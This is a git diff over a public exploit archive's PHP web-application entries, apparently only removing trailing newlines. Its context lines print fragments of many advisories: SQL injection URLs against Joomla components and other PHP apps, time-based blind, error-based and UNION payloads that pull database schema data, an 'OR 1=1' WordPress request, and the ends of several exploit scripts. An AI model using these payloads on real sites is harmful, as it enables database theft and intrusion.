1.5 SQL Injection Vulnerability +==-- --==+================================================================================+==-- -# milw0rm.com [2007-06-29] +# milw0rm.com [2007-06-29] \ No newline at end of file diff --git a/platforms/php/webapps/4128.txt b/platforms/php/webapps/4128.txt index ba24f23e1..d8f80b2bb 100755 --- a/platforms/php/webapps/4128.txt +++ b/platforms/php/webapps/4128.txt @@ -37,4 +37,4 @@ GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net, and the ASFC/FM4 peeps ! --==+ Buddy Zone Version 1.5 And Prior SQL Injection Vulnerability +==-- --==+================================================================================+==-- -# milw0rm.com [2007-06-30] +# milw0rm.com [2007-06-30] \ No newline at end of file diff --git a/platforms/php/webapps/41284.txt b/platforms/php/webapps/41284.txt index 198b87d23..bbd6067f4 100755 --- a/platforms/php/webapps/41284.txt +++ b/platforms/php/webapps/41284.txt @@ -17,4 +17,4 @@ # http://localhost/[PATH]/Compose.php?msgID=[SQL] # http://localhost/[PATH]/Compose.php?smsgID=[SQL] # Etc... -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41285.txt b/platforms/php/webapps/41285.txt index b034c3acf..b48a0cfe9 100755 --- a/platforms/php/webapps/41285.txt +++ b/platforms/php/webapps/41285.txt @@ -17,4 +17,4 @@ # http://localhost/[PATH]/Compose.php?draftID=[SQL] # http://localhost/[PATH]/Compose.php?smsgID=[SQL] # Etc... -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41287.txt b/platforms/php/webapps/41287.txt index 6501d2567..cf6bc2d1b 100755 --- a/platforms/php/webapps/41287.txt +++ b/platforms/php/webapps/41287.txt @@ -17,4 +17,4 @@ # http://localhost/[PATH]/index.php?view=ViewInvoice&id=[SQL] # http://localhost/[PATH]/index.php?view=ViewTicket&id=[SQL] # Etc... -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/4129.txt b/platforms/php/webapps/4129.txt index 60b2d10d1..6f9312523 100755 --- a/platforms/php/webapps/4129.txt +++ b/platforms/php/webapps/4129.txt @@ -31,4 +31,4 @@ #thanks:: str0ke -# milw0rm.com [2007-06-30] +# milw0rm.com [2007-06-30] \ No newline at end of file diff --git a/platforms/php/webapps/41290.txt b/platforms/php/webapps/41290.txt index 92c1820da..cbfe0bb52 100755 --- a/platforms/php/webapps/41290.txt +++ b/platforms/php/webapps/41290.txt @@ -15,4 +15,4 @@ # SQL Injection/Exploit : # http://localhost/[PATH]/?Style=[SQL] # Etc... -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/4130.txt b/platforms/php/webapps/4130.txt index 97881f9c7..63e4daef7 100755 --- a/platforms/php/webapps/4130.txt +++ b/platforms/php/webapps/4130.txt @@ -27,4 +27,4 @@ GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net ! --==+ TotalCalendar 2.402 SQL Injection Vulnerability +==-- --==+================================================================================+==-- -# milw0rm.com [2007-06-30] +# milw0rm.com [2007-06-30] \ No newline at end of file diff --git a/platforms/php/webapps/41304.txt b/platforms/php/webapps/41304.txt index f4d3fb39c..f9e5acfa6 100755 --- a/platforms/php/webapps/41304.txt +++ b/platforms/php/webapps/41304.txt @@ -15,4 +15,4 @@ # SQL Injection/Exploit : # http://localhost/[PATH]/search?keyword=[SQL] # http://localhost/[PATH]/download?file=[SQL] -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/4131.txt b/platforms/php/webapps/4131.txt index 962ac0f68..5a958b3b5 100755 --- a/platforms/php/webapps/4131.txt +++ b/platforms/php/webapps/4131.txt @@ -30,4 +30,4 @@ #thanks:: str0ke -# milw0rm.com [2007-06-30] +# milw0rm.com [2007-06-30] \ No newline at end of file diff --git a/platforms/php/webapps/41316.txt b/platforms/php/webapps/41316.txt index 4086d7c38..f855549cc 100755 --- a/platforms/php/webapps/41316.txt +++ b/platforms/php/webapps/41316.txt @@ -15,4 +15,4 @@ # SQL Injection/Exploit : # http://localhost/[PATH]/genres.php?id=[SQL] # Etc.. -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/4132.txt b/platforms/php/webapps/4132.txt index 20da52b63..b69009742 100755 --- a/platforms/php/webapps/4132.txt +++ b/platforms/php/webapps/4132.txt @@ -32,4 +32,4 @@ BUG: www.target.com/spellcheckwindowframeset.php?SpellIncPath=5h3LL --------------------------------------------------------------------------------- d0rk: :( -# milw0rm.com [2007-06-30] +# milw0rm.com [2007-06-30] \ No newline at end of file diff --git a/platforms/php/webapps/41322.txt b/platforms/php/webapps/41322.txt index 48cd5e13d..fe20d6783 100755 --- a/platforms/php/webapps/41322.txt +++ b/platforms/php/webapps/41322.txt @@ -12,5 +12,4 @@ # http://www.Target.com/index.php?option=com_onispetitions&view=petitions&tag=[SQL] # Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members -# Iranian white hat Hackers - +# Iranian white hat Hackers \ No newline at end of file diff --git a/platforms/php/webapps/41323.txt b/platforms/php/webapps/41323.txt index fe2ee65ee..6c0bd5b0d 100755 --- a/platforms/php/webapps/41323.txt +++ b/platforms/php/webapps/41323.txt @@ -12,5 +12,4 @@ # http://www.Target.com/index.php?option=com_onisquotes&view=quotes&tag=[SQL]&Itemid=180 # Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members -# Iranian white hat Hackers - +# Iranian white hat Hackers \ No newline at end of file diff --git a/platforms/php/webapps/41324.txt b/platforms/php/webapps/41324.txt index 876d00aa2..001a15f89 100755 --- a/platforms/php/webapps/41324.txt +++ b/platforms/php/webapps/41324.txt @@ -13,5 +13,4 @@ # http://www.Target.com/index.php?option=com_onismusic&view=songs&tag=[SQL] # Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members -# Iranian white hat Hackers - +# Iranian white hat Hackers \ No newline at end of file diff --git a/platforms/php/webapps/41325.txt b/platforms/php/webapps/41325.txt index 72ccc868b..bc5d649b0 100755 --- a/platforms/php/webapps/41325.txt +++ b/platforms/php/webapps/41325.txt @@ -13,5 +13,4 @@ # http://www.Target.com/index.php?option=com_sponsorwall&task=click&wallid=[SQL] # Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members -# Iranian white hat Hackers - +# Iranian white hat Hackers \ No newline at end of file diff --git a/platforms/php/webapps/41326.txt b/platforms/php/webapps/41326.txt index 5961c6174..b8dd68938 100755 --- a/platforms/php/webapps/41326.txt +++ b/platforms/php/webapps/41326.txt @@ -13,5 +13,4 @@ # http://www.Target.com/index.php?option=com_vikbooking&view=availability&room_ids[0]=[SQL] # Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members -# Iranian white hat Hackers - +# Iranian white hat Hackers \ No newline at end of file diff --git a/platforms/php/webapps/41327.txt b/platforms/php/webapps/41327.txt index eb5a70da7..7508d166d 100755 --- a/platforms/php/webapps/41327.txt +++ b/platforms/php/webapps/41327.txt @@ -13,5 +13,4 @@ # http://www.Target.com/index.php?option=com_soccerbet&view=matches&cat=[SQL] # Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members -# Iranian white hat Hackers - +# Iranian white hat Hackers \ No newline at end of file diff --git a/platforms/php/webapps/41329.txt b/platforms/php/webapps/41329.txt index 6863573d6..dabf7f553 100755 --- a/platforms/php/webapps/41329.txt +++ b/platforms/php/webapps/41329.txt @@ -57,4 +57,4 @@ http://localhost/shopby/all?c=Turkey Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind - Payload: c=Turkey' AND SLEEP(5) AND 'rmia'='rmia + Payload: c=Turkey' AND SLEEP(5) AND 'rmia'='rmia \ No newline at end of file diff --git a/platforms/php/webapps/4133.txt b/platforms/php/webapps/4133.txt index 97bf3207f..eaaa8fbf9 100755 --- a/platforms/php/webapps/4133.txt +++ b/platforms/php/webapps/4133.txt @@ -25,4 +25,4 @@ GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net ! --==+ Game Portal Manager v1.7 SQL Injection Vulnerability +==-- --==+================================================================================+==-- -# milw0rm.com [2007-07-01] +# milw0rm.com [2007-07-01] \ No newline at end of file diff --git a/platforms/php/webapps/41332.txt b/platforms/php/webapps/41332.txt index 2f96d9614..2c908474c 100755 --- a/platforms/php/webapps/41332.txt +++ b/platforms/php/webapps/41332.txt @@ -14,4 +14,4 @@ # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/index.php?option=com_jedirectory&view=item_detail&ditemid=[SQL] -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41333.txt b/platforms/php/webapps/41333.txt index fcd2826d5..380aa62bf 100755 --- a/platforms/php/webapps/41333.txt +++ b/platforms/php/webapps/41333.txt @@ -14,4 +14,4 @@ # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/index.php?option=com_jequoteform&view=form&Itemid=[SQL] -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41335.txt b/platforms/php/webapps/41335.txt index 4b3e54436..8a2a63f5d 100755 --- a/platforms/php/webapps/41335.txt +++ b/platforms/php/webapps/41335.txt @@ -15,4 +15,4 @@ # SQL Injection/Exploit : # http://localhost/[PATH]/index.php?option=com_jetour&view=package_detail&pid=[SQL] # http://localhost/[PATH]/index.php?option=com_jetour&view=package&cid=[SQL] -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41338.txt b/platforms/php/webapps/41338.txt index e66a36d2f..449e2beb1 100755 --- a/platforms/php/webapps/41338.txt +++ b/platforms/php/webapps/41338.txt @@ -14,4 +14,4 @@ # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/index.php?option=com_jeauto&view=item_detail&d_itemid=[SQL] -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/4134.txt b/platforms/php/webapps/4134.txt index 31a6c3415..3c04cf126 100755 --- a/platforms/php/webapps/4134.txt +++ b/platforms/php/webapps/4134.txt @@ -27,4 +27,4 @@ GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net ! --==+ Easybe 1-2-3 Music Store SQL Injection Vulnerability +==-- --==+================================================================================+==-- -# milw0rm.com [2007-07-01] +# milw0rm.com [2007-07-01] \ No newline at end of file diff --git a/platforms/php/webapps/41345.txt b/platforms/php/webapps/41345.txt index 989c026ee..7938c078c 100755 --- a/platforms/php/webapps/41345.txt +++ b/platforms/php/webapps/41345.txt @@ -14,4 +14,4 @@ # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/index.php?option=com_jeportfolio&view=item_detail&d_itemid=[SQL] -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41346.txt b/platforms/php/webapps/41346.txt index 73cf5008e..3fdae657d 100755 --- a/platforms/php/webapps/41346.txt +++ b/platforms/php/webapps/41346.txt @@ -14,4 +14,4 @@ # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/index.php?option=com_jeticket&view=assign_detail&cid[0]=[SQL] -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/4135.pl b/platforms/php/webapps/4135.pl index d848d25b1..6b198ee68 100755 --- a/platforms/php/webapps/4135.pl +++ b/platforms/php/webapps/4135.pl @@ -49,4 +49,4 @@ else die "Error: ".$response->status_line; } -# milw0rm.com [2007-07-01] +# milw0rm.com [2007-07-01] \ No newline at end of file diff --git a/platforms/php/webapps/41359.txt b/platforms/php/webapps/41359.txt index 246675091..f9f01bbdd 100755 --- a/platforms/php/webapps/41359.txt +++ b/platforms/php/webapps/41359.txt @@ -75,4 +75,4 @@ Type: Stored XSS Vulnerable URL:http://localhost/[PATH]/my-contactdetails.php Vulnerable Parameters: fname Method: POST -Payload: +Payload: \ No newline at end of file diff --git a/platforms/php/webapps/4136.txt b/platforms/php/webapps/4136.txt index d4db3bb41..d146d35a2 100755 --- a/platforms/php/webapps/4136.txt +++ b/platforms/php/webapps/4136.txt @@ -29,4 +29,4 @@ GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net ! --==+ YouTube Clone Script SQL Injection Vulnerability +==-- --==+================================================================================+==-- -# milw0rm.com [2007-07-02] +# milw0rm.com [2007-07-02] \ No newline at end of file diff --git a/platforms/php/webapps/41362.txt b/platforms/php/webapps/41362.txt index 8371f4bce..23e8dbc1e 100755 --- a/platforms/php/webapps/41362.txt +++ b/platforms/php/webapps/41362.txt @@ -14,4 +14,4 @@ # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/index.php?option=com_joomblog&task=tag&tag=Ihsan_Sencan[SQL] -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41371.txt b/platforms/php/webapps/41371.txt index 9f493fd9d..f9e290556 100755 --- a/platforms/php/webapps/41371.txt +++ b/platforms/php/webapps/41371.txt @@ -16,4 +16,4 @@ # http://localhost/[PATH]/index.php?option=com_spidercalendar&view=spidercalendar&calendar_id=[SQL] # http://localhost/[PATH]/index.php?option=com_spidercalendar&view=spidercalendar&calendar_id=1&module_id=92&date92=2017-02-3&cat_ids=&Itemid=[SQL] # Etc... -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41374.txt b/platforms/php/webapps/41374.txt index 9538a4ab8..04ca8c561 100755 --- a/platforms/php/webapps/41374.txt +++ b/platforms/php/webapps/41374.txt @@ -14,4 +14,4 @@ # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/index.php?option=com_spiderfaq&view=spiderfaqmultiple&standcat=0&faq_cats=,2,3,&standcatids=&theme=1&searchform=1&expand=0&Itemid=[SQL] -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41376.txt b/platforms/php/webapps/41376.txt index a0fec5d2a..f5379d7a3 100755 --- a/platforms/php/webapps/41376.txt +++ b/platforms/php/webapps/41376.txt @@ -41,4 +41,4 @@ for corner add list. And now Your xss will be executed. 5. If a normal editor,author visit the corner add list page xss will -effect them also. +effect them also. \ No newline at end of file diff --git a/platforms/php/webapps/41377.sh b/platforms/php/webapps/41377.sh index 8d63c2d25..30f1189b6 100755 --- a/platforms/php/webapps/41377.sh +++ b/platforms/php/webapps/41377.sh @@ -330,4 +330,4 @@ then fi test_exploit $target -exploit $target +exploit $target \ No newline at end of file diff --git a/platforms/php/webapps/4138.txt b/platforms/php/webapps/4138.txt index 01d04a2dc..35e7e62e3 100755 --- a/platforms/php/webapps/4138.txt +++ b/platforms/php/webapps/4138.txt @@ -14,4 +14,4 @@ Exploit: GREETZ: all memberz of RST and milw0rm //kw3rln [ http://rstzone.net ] -# milw0rm.com [2007-07-02] +# milw0rm.com [2007-07-02] \ No newline at end of file diff --git a/platforms/php/webapps/41384.txt b/platforms/php/webapps/41384.txt index ac7836ae5..e0790cc11 100755 --- a/platforms/php/webapps/41384.txt +++ b/platforms/php/webapps/41384.txt @@ -14,5 +14,4 @@ # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/index.php?option=com_joomloc&view=loc&layout=singleloc&site_id=[SQL] -# # # # # - +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/4139.txt b/platforms/php/webapps/4139.txt index c28bed714..a6b137c58 100755 --- a/platforms/php/webapps/4139.txt +++ b/platforms/php/webapps/4139.txt @@ -31,4 +31,4 @@ UPLOAD SHELL: GREETZ: all memberz of RST and milw0rm //kw3rln [http://rstzone.net] -# milw0rm.com [2007-07-02] +# milw0rm.com [2007-07-02] \ No newline at end of file diff --git a/platforms/php/webapps/41392.html b/platforms/php/webapps/41392.html index 5e2712d26..71b96b1e1 100755 --- a/platforms/php/webapps/41392.html +++ b/platforms/php/webapps/41392.html @@ -109,4 +109,4 @@ Fix/Patch: Update to latest version. Regards, Arbin Godar -https://twitter.com/arbingodar +https://twitter.com/arbingodar \ No newline at end of file diff --git a/platforms/php/webapps/41396.txt b/platforms/php/webapps/41396.txt index 6aaffceae..73fd771af 100755 --- a/platforms/php/webapps/41396.txt +++ b/platforms/php/webapps/41396.txt @@ -133,4 +133,4 @@ information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c) HYP3RLINX - -ApparitionSec +ApparitionSec \ No newline at end of file diff --git a/platforms/php/webapps/4140.txt b/platforms/php/webapps/4140.txt index 08596cdb4..857d4b2e1 100755 --- a/platforms/php/webapps/4140.txt +++ b/platforms/php/webapps/4140.txt @@ -45,4 +45,4 @@ Thx For : RomancyxHacker , Mogatil , Abo0oD , Mohandko , The Wolf Ksa , Root-She # www.hackteach.org -# milw0rm.com [2007-07-02] +# milw0rm.com [2007-07-02] \ No newline at end of file diff --git a/platforms/php/webapps/41400.txt b/platforms/php/webapps/41400.txt index 6306df46e..2f84425f1 100755 --- a/platforms/php/webapps/41400.txt +++ b/platforms/php/webapps/41400.txt @@ -14,5 +14,4 @@ # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/index.php?option=com_docmanpaypal&task=addToCart&id=[SQL] -# # # # # - +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41406.txt b/platforms/php/webapps/41406.txt index b9790dd04..d8bad0493 100755 --- a/platforms/php/webapps/41406.txt +++ b/platforms/php/webapps/41406.txt @@ -15,4 +15,4 @@ # SQL Injection/Exploit : # http://localhost/[PATH]/cruises/cruises?city=[SQL] # Etc... -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41407.txt b/platforms/php/webapps/41407.txt index 4a9bae1f4..70a951a59 100755 --- a/platforms/php/webapps/41407.txt +++ b/platforms/php/webapps/41407.txt @@ -16,4 +16,4 @@ # http://localhost/[PATH]/index.php?option=com_eventix&view=eventsday&selected_date=2017-02-16&day=[SQL] # http://localhost/[PATH]/index.php?option=com_eventix&view=eventsday&selected_date=[SQL] # http://localhost/[PATH]/index.php?option=com_eventix&view=eventssearch&=[SQL] -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41408.txt b/platforms/php/webapps/41408.txt index b1d4e97a2..09bb92dc7 100755 --- a/platforms/php/webapps/41408.txt +++ b/platforms/php/webapps/41408.txt @@ -15,4 +15,4 @@ # SQL Injection/Exploit : # http://localhost/[PATH]/index.php?option=com_jhotelreservation&tmpl=component&task=hotelratings.printRating&view=hotelratings&review_id=[SQL] # Etc... -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/4141.txt b/platforms/php/webapps/4141.txt index 71216fd53..a9837a2c8 100755 --- a/platforms/php/webapps/4141.txt +++ b/platforms/php/webapps/4141.txt @@ -28,4 +28,4 @@ GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net ! --==+ SuperCali Event Calendar SQL Injection Vulnerbility +==-- --==+================================================================================+==-- -# milw0rm.com [2007-07-03] +# milw0rm.com [2007-07-03] \ No newline at end of file diff --git a/platforms/php/webapps/41412.txt b/platforms/php/webapps/41412.txt index 3916973e7..e2b58c013 100755 --- a/platforms/php/webapps/41412.txt +++ b/platforms/php/webapps/41412.txt @@ -15,4 +15,4 @@ # SQL Injection/Exploit : # http://localhost/[PATH]/component/rsappt_pro3/booking_screen_gad/891/show_confirmation/ff09f352c87f96e505706df0cfa3e8cc/999[SQL] # http://localhost/[PATH]/index.php?option=com_rsappt_pro3&view=resourceslist&tags=[SQL] -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41413.rb b/platforms/php/webapps/41413.rb index 01f300856..0eb7c3e9b 100755 --- a/platforms/php/webapps/41413.rb +++ b/platforms/php/webapps/41413.rb @@ -173,4 +173,4 @@ class MetasploitModule < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/php/webapps/4142.txt b/platforms/php/webapps/4142.txt index 573ae6677..e702225b5 100755 --- a/platforms/php/webapps/4142.txt +++ b/platforms/php/webapps/4142.txt @@ -27,4 +27,4 @@ Cold !F iT z3ro , No One Equal One #Long life Palestine #http://hackteach.org -# milw0rm.com [2007-07-03] +# milw0rm.com [2007-07-03] \ No newline at end of file diff --git a/platforms/php/webapps/41427.txt b/platforms/php/webapps/41427.txt index 81f688272..1f672573d 100755 --- a/platforms/php/webapps/41427.txt +++ b/platforms/php/webapps/41427.txt @@ -14,4 +14,4 @@ # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/index.php?option=com_contentmap&owner=plugin&view=smartloader&id=10135&Itemid=606&type=json&filename=articlesmarkers&source=article&contentid=[SQL] -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41428.txt b/platforms/php/webapps/41428.txt index 81394434b..2e444ec8e 100755 --- a/platforms/php/webapps/41428.txt +++ b/platforms/php/webapps/41428.txt @@ -19,4 +19,4 @@ # http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=[SQL] # http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=[SQL] # http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=[SQL] -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41430.txt b/platforms/php/webapps/41430.txt index 999291a00..625947d51 100755 --- a/platforms/php/webapps/41430.txt +++ b/platforms/php/webapps/41430.txt @@ -15,4 +15,4 @@ # SQL Injection/Exploit : # http://localhost/[PATH]/index.php?option=com_booklibrary&task=suggestion&comment=[SQL] # http://localhost/[PATH]/index.php/component/booklibrary/0/search?searchtext=[SQL]&author=on&title=on&isbn=on'&bookid=on&description=on&publisher=on&pricefrom=19&priceto=287.9&catid=0&option=com_booklibrary&task=search&Itemid=207 -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41433.txt b/platforms/php/webapps/41433.txt index 67bec8174..803749ea9 100755 --- a/platforms/php/webapps/41433.txt +++ b/platforms/php/webapps/41433.txt @@ -152,6 +152,4 @@ Permission to electronically redistribute this alert in its unmodified form is g Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission. - Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™ - - + Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™ \ No newline at end of file diff --git a/platforms/php/webapps/41438.txt b/platforms/php/webapps/41438.txt index bab2a5f9a..2f15afb98 100755 --- a/platforms/php/webapps/41438.txt +++ b/platforms/php/webapps/41438.txt @@ -76,5 +76,4 @@ POST /wp-admin/admin-ajax.php?id= HTTP/1.1 ...snip... -action=my_action&url=%2Fvar%2Fwww%2Fhtml%2Fwp-content%2Fplugins%2Fmail-masta%2Finc%2Fcampaign_save.php&sender_selected_list_check=check&list_id=1+OR+1%3D1 - +action=my_action&url=%2Fvar%2Fwww%2Fhtml%2Fwp-content%2Fplugins%2Fmail-masta%2Finc%2Fcampaign_save.php&sender_selected_list_check=check&list_id=1+OR+1%3D1 \ No newline at end of file diff --git a/platforms/php/webapps/4144.php b/platforms/php/webapps/4144.php index c59ad0280..3d0ec6773 100755 --- a/platforms/php/webapps/4144.php +++ b/platforms/php/webapps/4144.php @@ -235,4 +235,4 @@ if (strstr($html,"666999")) # Coded With BH Fast Generator v0.1 ?> -# milw0rm.com [2007-07-03] +# milw0rm.com [2007-07-03] \ No newline at end of file diff --git a/platforms/php/webapps/41441.txt b/platforms/php/webapps/41441.txt index b9f0b1a42..b436bed51 100755 --- a/platforms/php/webapps/41441.txt +++ b/platforms/php/webapps/41441.txt @@ -16,4 +16,4 @@ # Login as regular user # http://localhost/[PATH]/index.php?option=com_userextranet&view=folders&fid=[SQL] # 66+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- - -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41442.txt b/platforms/php/webapps/41442.txt index ee8727106..e38a3ff1f 100755 --- a/platforms/php/webapps/41442.txt +++ b/platforms/php/webapps/41442.txt @@ -20,4 +20,4 @@ # -66'+/*!50000union*/+select+1,0x496873616e2053656e63616e,3,4,5,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),7,8+-- - # http://localhost/[PATH]/index.php/component/multitier/?mtpage=takecodeb&tid=1&bid=[SQL] # -66'+/*!50000union*/+select+(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),2,3+-- - -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41445.txt b/platforms/php/webapps/41445.txt index d27beaa6f..486dd2c47 100755 --- a/platforms/php/webapps/41445.txt +++ b/platforms/php/webapps/41445.txt @@ -16,4 +16,4 @@ # http://localhost/[PATH]/index.php?option=com_jofacebookgallery&view=category&id=[SQL] # http://localhost/[PATH]/index.php?option=com_jofacebookgallery&view=albums&id=[SQL] # http://localhost/[PATH]/index.php?option=com_jofacebookgallery&view=photo&id=[SQL] -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41447.txt b/platforms/php/webapps/41447.txt index 8d16b9633..2f298d080 100755 --- a/platforms/php/webapps/41447.txt +++ b/platforms/php/webapps/41447.txt @@ -16,4 +16,4 @@ # index.php?option=com_communitysurveys&view=search # http://localhost/[PATH]/?list_filter=Ihsan_Sencan&list_filter_field=author&filter_all_keywords=1&filter_order=a.catid&filter_order_Dir=desc&catid[]=[SQL] # 66+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x496873616e2053656e63616e,0x7e,0x27,CAST(schema_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMATA+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1 -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/4145.php b/platforms/php/webapps/4145.php index 750b2f044..4cd1154d5 100755 --- a/platforms/php/webapps/4145.php +++ b/platforms/php/webapps/4145.php @@ -184,4 +184,4 @@ if (strstr($html,"666999")) # Coded With BH Fast Generator v0.1 ?> -# milw0rm.com [2007-07-03] +# milw0rm.com [2007-07-03] \ No newline at end of file diff --git a/platforms/php/webapps/41450.txt b/platforms/php/webapps/41450.txt index 3c3e5735c..c2a4bd4c0 100755 --- a/platforms/php/webapps/41450.txt +++ b/platforms/php/webapps/41450.txt @@ -16,4 +16,4 @@ # index.php?option=com_gpstools&view=search # http://localhost/[PATH]/?list_filter=Ihsan_Sencan&list_filter_field=author&filter_all_keywords=1&filter_order=a.catid&filter_order_Dir=desc&catid[]=[SQL] # 66+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x496873616e2053656e63616e,0x7e,0x27,CAST(schema_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMATA+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1 -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41455.txt b/platforms/php/webapps/41455.txt index 729cf27e7..312166c20 100755 --- a/platforms/php/webapps/41455.txt +++ b/platforms/php/webapps/41455.txt @@ -27,4 +27,4 @@ STORED ### Result Access index.php after memcache-viewer login DOM Area in index.php -hacked22 +hacked22 \ No newline at end of file diff --git a/platforms/php/webapps/41456.txt b/platforms/php/webapps/41456.txt index 7625db244..637c9f3fc 100755 --- a/platforms/php/webapps/41456.txt +++ b/platforms/php/webapps/41456.txt @@ -24,4 +24,4 @@ # http://localhost/[PATH]/index.php?option=com_intranet&controller=reservas&task=paso1&tipoIdaVuelta=1&rutaSalida=20&rutaDestino=[SQL] # http://localhost/[PATH]/index.php?option=com_intranet&controller=reservas&task=paso1&tipoIdaVuelta=1&rutaSalida=[SQL] # Etc.. -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41462.txt b/platforms/php/webapps/41462.txt index d94380129..d873743d1 100755 --- a/platforms/php/webapps/41462.txt +++ b/platforms/php/webapps/41462.txt @@ -18,5 +18,4 @@ # http://localhost/[PATH]/my-appointments/my-appointments/edit?id=[SQL] # '+order+by+10-- - # Etc... -# # # # # - +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41465.txt b/platforms/php/webapps/41465.txt index 0bfd96327..032310d1f 100755 --- a/platforms/php/webapps/41465.txt +++ b/platforms/php/webapps/41465.txt @@ -17,4 +17,4 @@ # http://localhost/[PATH]/groups/?IhsanSencan=[SQL] # http://localhost/[PATH]/videos/?IhsanSencan=[SQL] # http://localhost/[PATH]/events/?IhsanSencan=[SQL] -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/4147.php b/platforms/php/webapps/4147.php index 7b7d0e43c..2a464b175 100755 --- a/platforms/php/webapps/4147.php +++ b/platforms/php/webapps/4147.php @@ -313,4 +313,4 @@ function find_username () } ?> -# milw0rm.com [2007-07-03] +# milw0rm.com [2007-07-03] \ No newline at end of file diff --git a/platforms/php/webapps/41470.txt b/platforms/php/webapps/41470.txt index 87cd52a4b..defe23c1a 100755 --- a/platforms/php/webapps/41470.txt +++ b/platforms/php/webapps/41470.txt @@ -15,4 +15,4 @@ # SQL Injection/Exploit : # http://localhost/[PATH]/components/com_onevote/results.php?election_id=[SQL] # 